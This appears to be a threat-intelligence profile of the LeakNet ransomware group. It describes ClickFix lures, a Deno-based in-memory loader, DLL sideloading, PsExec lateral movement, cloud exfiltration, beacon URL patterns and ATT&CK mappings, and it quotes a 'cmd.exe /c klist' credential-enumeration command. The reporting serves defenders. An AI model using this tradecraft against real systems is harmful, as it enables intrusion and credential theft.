LeakNet

LeakNet is an emerging ransomware operator first observed in late 2024. Reporting cited in the content attributes several recent incidents to LeakNet with high confidence based on overlapping infrastructure and consistent TTPs. The group was described as averaging about three victims per month, but is scaling up and shifting from reliance on initial access brokers toward self-directed access operations. Observed initial access includes ClickFix social engineering delivered through compromised legitimate websites, including fake Cloudflare Turnstile verification pages that trick users into manually running malicious msiexec commands to download and execute a loader. The campaign was described as opportunistic rather than narrowly targeted. A separate intrusion attempt using Microsoft Teams phishing led to a similar Deno-based loader, but attribution for that specific case was noted as inconclusive. A notable capability associated with LeakNet is a previously unreported Deno-based in-memory loader. The group uses a bring-your-own-runtime approach by installing the legitimate Deno executable and executing base64-encoded JavaScript from a data URL largely in memory, reducing disk artifacts. In observed activity, execution was initiated through VBS and PowerShell scripts named Juliet*.vbs and Romeo*.ps1. The loader fingerprints the host by collecting data such as username, hostname, total memory, and OS release, generates a victim identifier, checks in to attacker-controlled infrastructure to obtain a victim-specific second stage, attempts to bind to a local port to avoid duplicate execution, and then enters a polling loop to repeatedly fetch and execute additional code. Across confirmed incidents, LeakNet used a consistent post-exploitation chain. This included DLL sideloading by placing a malicious jli.dll next to a legitimate Java process in C:\ProgramData\USOShared, running cmd.exe /c klist to enumerate active authentication credentials, using PsExec for lateral movement, and staging payloads or supporting exfiltration through Amazon S3 buckets and other trusted cloud services. Beaconing was observed to multiple domains with a similar URL structure ending in /intake/organizations/events?channel=app. The content maps LeakNet activity to MITRE ATT&CK techniques including T1189, T1204.004, T1059.007, T1218.007, T1574.001, T1620, T1021.002, T1071.001, and T1102.002. No nation-state affiliation or additional aliases/sub-groups beyond LeakNet are provided in the content.